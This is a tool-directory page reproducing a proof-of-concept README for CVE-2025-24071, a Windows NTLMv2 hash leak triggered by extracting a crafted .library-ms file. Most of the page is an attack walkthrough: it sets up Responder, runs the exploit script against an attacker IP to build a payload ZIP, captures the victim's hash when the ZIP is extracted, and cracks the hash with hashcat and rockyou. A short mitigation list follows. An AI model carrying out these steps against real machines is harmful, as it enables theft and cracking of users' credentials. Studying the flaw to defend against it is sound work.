Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-24071-POC-NTLMHashDisclosure- — CVE-2025-24071: NTLMv2 Hash Disclosure via .library-ms File | Kitploit
Tools/GitHubGitHub/deshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-
Password CrackingReconnaissanceVulnerability AnalysisExploitationInformation GatheringRed Teaming
GitHubdeshanfer94/cve-2025-24071-poc-ntlmhashdisclosure-

CVE-2025-24071-POC-NTLMHashDisclosure-

CVE-2025-24071: NTLMv2 Hash Disclosure via .library-ms File

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
11 year agoNot yet reviewed

CVE-2025-24071-POC-NTLMHashDisclosure

  • Triggers automatic SMB authentication to an attacker-controlled share.
  • No interaction required — Windows Explorer initiates this NTLM authentication automatically.
  • Results in NTLMv2 hash leakage (information disclosure).
  • Affects Windows 10/11 all versions, especially 11 23H2.

Set Up the Attacker Environment

sudo apt update && sudo apt install responder -y

Start Responder

sudo responder -I eth0

Run the Exploit Script

Install required Python module

pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep

This will generate: testpayload.library-ms testpayload.zip

Test on the Victim Machine

Transfer testpayload.zip to the Windows 11 test machine. Extract the ZIP using Windows File Explorer. This triggers Windows to try accessing the SMB path, leaking the NTLM hash.

Capture the Hash

responder -I etho0

Image

Prepare the Hash File

create hash,txt file

victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3

Choose a Wordlist

most common rockyou.txt

Run Hashcat

hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt

Image

Mitigation

  • Block outbound SMB (TCP 445) at firewalls.
  • Disable automatic authentication to untrusted SMB shares (group policy).
  • Monitor for .library-ms file extraction and SMB connections.
Download Tool